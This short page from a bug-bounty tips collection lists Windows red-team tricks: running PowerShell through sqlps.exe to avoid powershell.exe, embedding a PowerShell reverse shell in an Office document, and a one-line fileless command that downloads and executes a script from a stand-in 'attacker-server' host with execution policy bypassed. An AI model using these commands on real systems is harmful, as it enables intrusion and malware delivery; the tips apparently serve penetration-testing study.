Book of BugBounty Tips
Search...
Ctrl
K
Windows
Previous
Tweets Collection by @Pentesterland
Next
Linux
Last updated
5 years ago
Want to run powershell without using powershell.exe! If your target have Microsoft SQL Server installed use sqlps.exe#pentest #redteam
Generating a Reverse shell in Powershell, and then embedding it in an Office Document. #pentesting #redteam #BugBounty
Download and execute a #PowerShell script without touching the disk (fileless). powershell -exec bypass -c "iwr('http://attacker-server/payload.ps1')|iex"#pentest #postexploitation #oscp